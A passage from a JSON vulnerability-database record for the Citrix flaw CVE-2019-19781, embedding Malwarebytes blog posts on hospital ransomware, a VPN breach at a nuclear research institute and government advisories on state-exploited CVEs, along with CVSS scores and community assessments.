{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-26T00:00:00", "id": "CPAI-2019-1653", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2020-10-08T17:44:01", "description": "A recent ransomware attack which played a significant role in the death of a German woman has put into focus both the dangers and the importance of cybersecurity today. But it has also led some to point fingers as to who was responsible. \n\nAs usual, playing the blame game helps no one, but it does remind us of the dire need to work on healthcare security.\n\n### What happened?\n\nA few weeks ago, the university hospital Uniklinikum in the German city of D\u00fcsseldorf suffered a ransomware attack. The hospital decided not to admit new patients until it resolved the situation and restored normal operations.\n\nBecause of the admissions stop, a woman in need of immediate help had to be driven to the hospital of Wuppertal which is about 20 miles further. Unfortunately, she died upon arrival. The extra 30 minutes it took to get her to the next hospital turned out to be fatal. \n\nAs it turned out, the target of the ransomware gang was not even the hospital, but the university the hospital belongs to. When the attackers learned that the hospital had fallen victim as well, they handed over the decryption key for free. Despite that key, it took the hospital more than two weeks to reach a level of operability that allowed them to take on new patients. \n\nThis is not only tragic because the woman might have been saved if the university hospital had been operational, but also because it demonstrates once more how one of the most important parts of our infrastructure is lacking adequate defenses against prevalent threats likes ransomware.\n\n### What are the main problems facing healthcare security?\n\nIn the past we have identified several elements that make the healthcare industry, and hospitals in particular, more vulnerable to cyberthreats than many other verticals. \n\nHere are some of those problem elements:\n\n * The Internet of Things (IoT): Due to their nature and method of use, you will find a lot of IoT devices in hospitals that all run on different operating systems and require specific security settings in order to shield them from the outside world.\n * Legacy systems: Quite often, older equipment will not run properly under newer operating systems which results in several systems that are running on an outdated OS and even on software that has reached the [end-of-life point](<https://blog.malwarebytes.com/awareness/2020/03/windows-7-is-eol-what-next/>). This means that the software will no longer receive patches or updates even when there are known issues.\n * Lack of adequate backups: Even when the underlying problem has been resolved, it can take far too long for an attacked target to get back to an operational state. Institutes need to at least have a backup plan and maybe even backup equipment and servers for the most vital functions so they can keep them running when disaster strikes.\n * Extra stressors: Additional issues like COVID-19, fires, and other natural disasters can cut time and push aside the need to perform updates, make backups, or think about anything cybersecurity related. These stressors and other reasons are often referred to as "we have more important things to do."\n\n### IoT security risks\n\nMany medical devices that investigate and monitor the patient are connected to the internet. We consider them to be part of the [Internet of Things (IoT)](<https://blog.malwarebytes.com/101/2017/12/internet-things-iot-security-never/>). This group of devices comes with its own set of security risks, especially when it comes to [personally ](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>)[identifiable](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>)[ information (PII)](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>). \n\nIn every case it is advisable to investigate whether the devices\u2019 settings allow to approach it over the intranet instead of the internet. If possible, that makes it easier to shield the device from unauthorized access and keep the sensitive data inside the security perimeter.\n\n### Legacy systems\n\nMedical systems come from various suppliers and in any hospital you will find many different types. Each with their own goal, user guide, and updating regime. For many legacy systems, the acting rule of thumb will be not to tinker with it if it works. The fear of a system failure outweighs the urgency to install the latest patches. And we can relate to that state of mind except when applied to security updates on a connected system.\n\n### Disaster stress\n\nOkay, here comes our umpteenth mention of COVID-19\u2014I know, but it is a factor that we can\u2019t ignore. \n\nThe recent global pandemic contributes to the lack of time that IT staff at many healthcare organizations feel they have. The same is true for many other disasters that require emergency solutions to be set up. \n\nIn some cases, entire specialized clinics were built to deal with COVID-19 victims, and to replace lost capacity in other disasters like wildfires and earth slides.\n\n### More important matters at hand?\n\nIt's difficult to overstate the importance of "triage" in the healthcare system. Healthcare professionals like nurses and doctors likely practice it every day, prioritizing the most critical patient needs on a second-by-second basis. \n\nIt should serve as no surprise that triaging has a place in IT administration, too. Healthcare facilities should determine which systems require immediate attention and which systems can wait. \n\nInterestingly, the CISO of the hospital which suffered from the ransomware attack was accused of negligence in some German media. Law enforcement in Germany is moving forward with both trying to identify the individuals behind the ransomware attack, as well as potentially charging them with negligent manslaughter because of the woman's death. \n\nWhile we can hardly blame the CISO for the woman\u2019s death, there may come a time when inadequate security and its results may carry punishment for those responsible.\n\n### Ransomware in particular\n\nThe ransomware at play in the German case was identified as DoppelPaymer and it was determined to be planted inside the organization using the [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) vulnerability in Citrix VPNs. \n\nIn more recent news, we learned that [UHS hospitals](<https://www.bleepingcomputer.com/news/security/uhs-hospitals-hit-by-reported-country-wide-ryuk-ransomware-attack/>) in the US were hit by [Ryuk ransomware](<https://blog.malwarebytes.com/detections/ransom-ryuk/>). \n\nIt's also important to remember that the costs of a [ransomware attack ](<https://www.malwarebytes.com/ransomware/>)are often underestimated. People tend to look only at the actual ransom amount demanded, but the additional costs are often much higher than that. \n\nIt takes many people-hours to restore all the affected systems in an organization and return to a fully operational state. The time to recover will be lower in an organization that comes prepared. Having a restoration plan and adequate backups that are easy to deploy can streamline the process of getting back in business. Another important task is to figure out how it happened and how to plug the hole, so it won\u2019t happen again. Also, a thorough investigation may be necessary to check whether the attacker did not leave any [backdoors ](<https://www.malwarebytes.com/backdoor/>)behind.\n\n### There\u2019s a problem for every solution\n\nSecurity will probably never reach a watertight quality, so besides making our infrastructure, especially the vital parts of it, as secure as possible, we also need to think ahead and make plans to deal with a breach. Whether it\u2019s a data breach or an attack that cripples important parts of our systems, we want to be prepared. Knowing what to do\u2014and in what order\u2014can save a lot of time in disaster recovery. Having the tools and backups at hand is the second step in limiting the damages and help with a speedy recovery.\n\nTo sum it up, you are going to need:\n\n * Recovery plans for different scenarios: [data breaches](<https://www.malwarebytes.com/data-breach/>), ransomware attacks, you name it\n * File backups that are recent and easy to deploy or another type of rollback method\n * Backup systems that can take over when critical systems are crippled\n * Training for those involved, or at least an opportunity to familiarize them with the steps of the recovery plans\n\nAnd last but not least, don\u2019t forget to focus on prevention. The best thing about a recovery plan is when you never need it.\n\nStay safe, everyone!\n\nThe post [Healthcare security update: death by ransomware, what's next?](<https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-08T15:30:00", "type": "malwarebytes", "title": "Healthcare security update: death by ransomware, what\u2019s next?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-10-08T15:30:00", "id": "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "href": "https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say "I told you so", but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea's state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers' IP addresses was blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can't rule out a zero-day, that fact that this wasn't mentioned, and that the system was updated in response, suggests it wasn't. It certainly doesn't need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with year the CVE was issued. What's most striking about the NSA's list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories' executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won't be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-01-01T11:13:18", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:29am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**zeroSteiner** at January 02, 2020 3:42pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**dmelcher5151** at April 16, 2020 12:56am UTC reported:\n\nAWS had pre built 